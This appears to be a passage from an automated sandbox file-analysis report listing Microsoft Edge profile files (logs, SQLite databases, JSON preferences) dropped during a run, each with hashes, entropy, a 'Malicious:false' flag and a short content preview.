                                                                                                                                                                                                                                                                                                SSDEEP:6:iOvgcr+q2Pwkn23oH+TcwtzjqEKj0QMxIFUtdgObZmwrgLNVkwOwkn23oH+TcwtT:7RSvYfYebvqBZFUth/q5JfYebvqBaJ
                                                                                                                                                                                                                                                                                                MD5:FB5AB6874DAEE3B870176E0104BB3DA6
                                                                                                                                                                                                                                                                                                SHA1:FEFA0D199F19A1DAFAB5C7EB7E99094734F4B8E9
                                                                                                                                                                                                                                                                                                SHA-256:460F2B7E64A1F18ECD310645D3A47998229131A1951FA60F04449F60919FC6CC
                                                                                                                                                                                                                                                                                                SHA-512:3248B8DD1E8A898BA2EC0B047C745856463E7C6C3AE16FB0E80C5D1A92CFB74F28777AA21E1CA349A57F6572D87D84579597CA0E67956A3600C3F0B2451F28F4
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2025/03/08-18:43:48.166 4b8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2025/03/08-18:43:48.168 4b8 Recovering log #3.2025/03/08-18:43:48.172 4b8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):326
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.238470732315524
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:iOv0YU+q2Pwkn23oH+TcwtpIFUtds5ZmwrstVkwOwkn23oH+Tcwta/WLJ:782vYfYebmFUtS5/QT5JfYebaUJ
                                                                                                                                                                                                                                                                                                MD5:101126172992BEFD3C8809A13F433849
                                                                                                                                                                                                                                                                                                SHA1:B8B4C6DCC841A11E5E52447F816542B11682A3CF
                                                                                                                                                                                                                                                                                                SHA-256:AED7826034546A94B9ACA29F83F56FE4FC8BD9926EB584B473184ABCE2B1610E
                                                                                                                                                                                                                                                                                                SHA-512:24632C62D830FAAC475A7FD46CB8691B28680789BDF3C88CC8F79E21B7DE7FCB4B209818BC1448D4839FB140C1F5522E1D0E2CD0EA695352F8074538AD6CFC82
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2025/03/08-18:43:29.719 1de8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2025/03/08-18:43:29.720 1de8 Recovering log #3.2025/03/08-18:43:29.720 1de8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG.old (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):326
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.238470732315524
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:iOv0YU+q2Pwkn23oH+TcwtpIFUtds5ZmwrstVkwOwkn23oH+Tcwta/WLJ:782vYfYebmFUtS5/QT5JfYebaUJ
                                                                                                                                                                                                                                                                                                MD5:101126172992BEFD3C8809A13F433849
                                                                                                                                                                                                                                                                                                SHA1:B8B4C6DCC841A11E5E52447F816542B11682A3CF
                                                                                                                                                                                                                                                                                                SHA-256:AED7826034546A94B9ACA29F83F56FE4FC8BD9926EB584B473184ABCE2B1610E
                                                                                                                                                                                                                                                                                                SHA-512:24632C62D830FAAC475A7FD46CB8691B28680789BDF3C88CC8F79E21B7DE7FCB4B209818BC1448D4839FB140C1F5522E1D0E2CD0EA695352F8074538AD6CFC82
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2025/03/08-18:43:29.719 1de8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2025/03/08-18:43:29.720 1de8 Recovering log #3.2025/03/08-18:43:29.720 1de8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Top Sites

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 7, 1st free page 5, free pages 2, cookie 0x5, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):28672
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.26707851465859517
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:TLPp5yN8h6MvDOH+FxOUwa5qVZ7Nkl25Pe2d:TLh8Gxk+6Uwc8NlYC
                                                                                                                                                                                                                                                                                                MD5:04F8B790DF73BD7CD01238F4681C3F44
                                                                                                                                                                                                                                                                                                SHA1:DF12D0A21935FC01B36A24BF72AB9640FEBB2077
                                                                                                                                                                                                                                                                                                SHA-256:96BD789329E46DD9D83002DC40676922A48A3601BF4B5D7376748B34ECE247A0
                                                                                                                                                                                                                                                                                                SHA-512:0DD492C371D310121F7FD57D29F8CE92AA2536A74923AC27F9C4C0C1580C849D7779348FC80410DEBB5EEE14F357EBDF33BF670D1E7B6CCDF15D69AC127AB7C3
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g.......j.j................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 89, cookie 0x66, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):184320
                                                                                                                                                                                                                                                                                                Entropy (8bit):1.0671957926093731
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:QSqzWMMUfTbnGCTjHbRJkkqtXaWTK+hGgH+6e7EHVumYM1n6:QrzWMff/nzkkqtXnTK+hNH+5EVuml
                                                                                                                                                                                                                                                                                                MD5:47A49EF7F7D1B6854EBBFE8CB908E157
                                                                                                                                                                                                                                                                                                SHA1:0964C5D7619981E8D11BF2978C765B1BD70BE3EE
                                                                                                                                                                                                                                                                                                SHA-256:575ABE57046885961F017694C1D210428CB900D99F34A9CB9A8FCAAC60C2C166
                                                                                                                                                                                                                                                                                                SHA-512:D84817B3FCD6EB884AB1CA2017862F3401A7731A4E0BB971BF6431D98F009809274FB5E971A44ACC99A1E0F32F0061D4479FC5F921553AD86D10E82AB7AAD3E7
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ .......Y...........f......................................................j............O........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\WebAssistDatabase

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 7, cookie 0xb, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):14336
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.7836182415564406
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:LLqlCouxhK3thdkSdj5QjUsEGcGBXp22iSBgm+xjgm:uOK3tjkSdj5IUltGhp22iSBgm+xj/
                                                                                                                                                                                                                                                                                                MD5:AA9965434F66985F0979719F3035C6E1
                                                                                                                                                                                                                                                                                                SHA1:39FC31CBB2BB4F8FA8FB6C34154FB48FBCBAEEF4
                                                                                                                                                                                                                                                                                                SHA-256:F42877E694E9AFC76E1BBA279F6EC259E28A7E7C574EFDCC15D58EFAE06ECA09
                                                                                                                                                                                                                                                                                                SHA-512:201667EAA3DF7DBCCF296DE6FCF4E79897C1BB744E29EF37235C44821A18EAD78697DFEB9253AA01C0DC28E5758E2AF50852685CDC9ECA1010DBAEE642590CEA
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..................n..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\WebStorage\QuotaManager

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):40960
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.46653698685558154
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcB0LxW:v7doKsKuKZKlZNmu46yjx0Lk
                                                                                                                                                                                                                                                                                                MD5:59C75EF6017586F842EED062F9CCADA3
                                                                                                                                                                                                                                                                                                SHA1:FADA7C6E84D0B65A852FD46D82F888EC04613FCB
                                                                                                                                                                                                                                                                                                SHA-256:144B8DEDDC0FA9C0AB6BD8A2D73B98EC1E0671020906FB6C48E2490A4B288753
                                                                                                                                                                                                                                                                                                SHA-512:467F4A39FA1985FF8A6B6E16650E3F82AD883B555325343757A666CBDC2DB283B4291DEAC98408ED2A3C34CA0605AA262A5AEC4D46F93723072AB822B6703730
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.......w..g...........M...w..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\arbitration_service_config.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):11755
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.190465908239046
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                                                                                                                                                                                                                                                                                MD5:07301A857C41B5854E6F84CA00B81EA0
                                                                                                                                                                                                                                                                                                SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                                                                                                                                                                                                                                                                                SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                                                                                                                                                                                                                                                                                SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\b4df57aa-68a9-42d5-b2e3-dde4b3e11488.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):24853
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.566152891841855
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:768:GRF/SpWP0SfyB8F1+UoAYDCx9Tuqh0VfUC9xbog/OVLyaI3rwkp6tuT:GRF/SpWP0SfyBu1jaS3IkZts
                                                                                                                                                                                                                                                                                                MD5:B78455B54DF32F2EF1B22687C86582A6
                                                                                                                                                                                                                                                                                                SHA1:94417439CFDAE74E8D04AA88B625C622B52982C1
                                                                                                                                                                                                                                                                                                SHA-256:0B8756AC17E887BA3C0F178833AB2A12EA5935F15EBB4463043FD0D074A04115
                                                                                                                                                                                                                                                                                                SHA-512:37E38B0987E9E21E8F6549D424C0B6686FEFCE1F8F60416743345B24917C23FFFC464F4BEEED78D3BDC448DDBBCD896C2EA5D5AB38727C9B5CDCAA228321E34C
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13385951009736498","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13385951009736498","location":5,"ma

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\d5e2e29e-ce3d-44d5-899e-9e94b06b877d.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):13711
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.190419076544022
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:sVpJ9pQTryZiuaba4uypqJj4wwY1Sq1YNNDNC8Rpj+FimQwqqU91f:sVpLAJu4qJcw31YpU3QwpW
                                                                                                                                                                                                                                                                                                MD5:48B3BF716856C1CF456C6B826BD1DCC3
                                                                                                                                                                                                                                                                                                SHA1:1CD5DE757D39D7E45602934A20B507B7C960BCFD
                                                                                                                                                                                                                                                                                                SHA-256:21391E2928F6805D668A5630DBCD78ADAA326F0F91D8193AF5FDF71F7BB8C85C
                                                                                                                                                                                                                                                                                                SHA-512:6EB47A9CFBDE20C4791CC5F8D8B441DA51589BDEB9B2F4573299482A5CC7FFABD500509E0B5BBC959C5108BAF527BE984B7FB035D25C63607CB35BFC2E084B47
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13385951010462368","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b649608c":{"last_path":""},"3b5ee6f6-5322-4061-81e4-d976818

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\databases\Databases.db

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):28672
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.3410017321959524
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
                                                                                                                                                                                                                                                                                                MD5:98643AF1CA5C0FE03CE8C687189CE56B
                                                                                                                                                                                                                                                                                                SHA1:ECADBA79A364D72354C658FD6EA3D5CF938F686B
                                                                                                                                                                                                                                                                                                SHA-256:4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
                                                                                                                                                                                                                                                                                                SHA-512:68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g.....P....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\heavy_ad_intervention_opt_out.db

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 4, cookie 0x2, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):16384
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.35226517389931394
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:TLC+waBg9LBgVDBgQjiZBgKuFtuQkMbmgcVAzO5kMCgGUg5OR:TLPdBgtBgJBgQjiZS53uQFE27MCgGZsR
                                                                                                                                                                                                                                                                                                MD5:D2CCDC36225684AAE8FA563AFEDB14E7
                                                                                                                                                                                                                                                                                                SHA1:3759649035F23004A4C30A14C5F0B54191BEBF80
                                                                                                                                                                                                                                                                                                SHA-256:080AEE864047C67CB1586A5BA5EDA007AFD18ECC2B702638287E386F159D7AEE
                                                                                                                                                                                                                                                                                                SHA-512:1A915AF643D688CA68AEDC1FF26C407D960D18DFDE838B417C437D7ADAC7B91C906E782DCC414784E64287915BD1DE5BB6A282E59AA9FEB8C384B4D4BC5F70EC
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.......Q......Q......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-shm

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):32768
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.09384237842371208
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:GUpYXDTpYXZ/l489XHl/Vl/Vl/Vl/Vl/Vl/Vl/Vl/Vl/Vl/Vl/Vl/Vl/Vl/Unno9:/YXDdYXB6sFnnnnnnnnnnnnnRwE
                                                                                                                                                                                                                                                                                                MD5:77E54F962571AA37F80BA18D41395865
                                                                                                                                                                                                                                                                                                SHA1:CC61AB1A0CE92C56E2F5B25A509C73735B030901
                                                                                                                                                                                                                                                                                                SHA-256:566F280E2329823FDCF411B75280F394D9586468D54AEE5417938EFB5913B47C
                                                                                                                                                                                                                                                                                                SHA-512:90D0864A7C995970EEBC3F38ED060FFE9BBE8D6187EDB11F11BA6541A95E2FF17413ADE177C78AA6CDA54D3B48F801B27EADCC8B6CC99581230B4F50CD7BDEB8
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:..-.............D.......s..J.=....1.S+.q.2..( )...-.............D.......s..J.=....1.S+.q.2..( ).........@...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-wal

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):280192
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.9450523260220746
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:384:pGEEC1F7ByJEl2tbQsNi/YKiIVaiF6YiFR8biKob8qiwuf+8FUi7yfyLuynyMwye:7uYgGGXKxnbeH
                                                                                                                                                                                                                                                                                                MD5:1E76D89F0BB9B1E244188603AE514712
                                                                                                                                                                                                                                                                                                SHA1:D7198CF23572FA21414E9ED8FEA37D7AFEB2E452
                                                                                                                                                                                                                                                                                                SHA-256:49D61A49F9D4F11AD3A753B8DB43C7F00ACEA26C57FE09050EF9038091514CCE
                                                                                                                                                                                                                                                                                                SHA-512:50DDD647C53FFD33D1D998B49AA21B478E94D06269C5E6D21D19E0A4C6D4DDF9E5BA18554A54C4A841011593DE475D3ADF22A3BF0F8D1B706CD698334F117E59
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:7....-............1.S+.q.................1.S+.q..).....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000001.dbtmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):155
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.3202647915723045
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:VVXntjQPEnjQvxlQ/l3seGKT9rcQ6xFQyOtl:/XntM+4lQl3sedhOFQyO
                                                                                                                                                                                                                                                                                                MD5:224AD3AC3FED023EE525FE7C360DFEA0
                                                                                                                                                                                                                                                                                                SHA1:92B75C18545003D010C9F41C5F2916C39DDE222E
                                                                                                                                                                                                                                                                                                SHA-256:082D1B5BDE363A4DDD4850F86CC9883E5F348F6FBFBEA7418AFE1F246578F211
                                                                                                                                                                                                                                                                                                SHA-512:727FA7928F454E18D2CBC80E39F34E7C96FFB88D831B13A23DCB21CE044049EA0E619206B2FD841E80CAB572FB88AD1C079667B74E6F3144E3C6C39F89A8FC2B
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:A..r.................20_1_1...1.,U.................20_1_1...1..&f...............{[..0................39_config..........6.....n ....1u}.=...............

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\CURRENT (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                Malicious:false
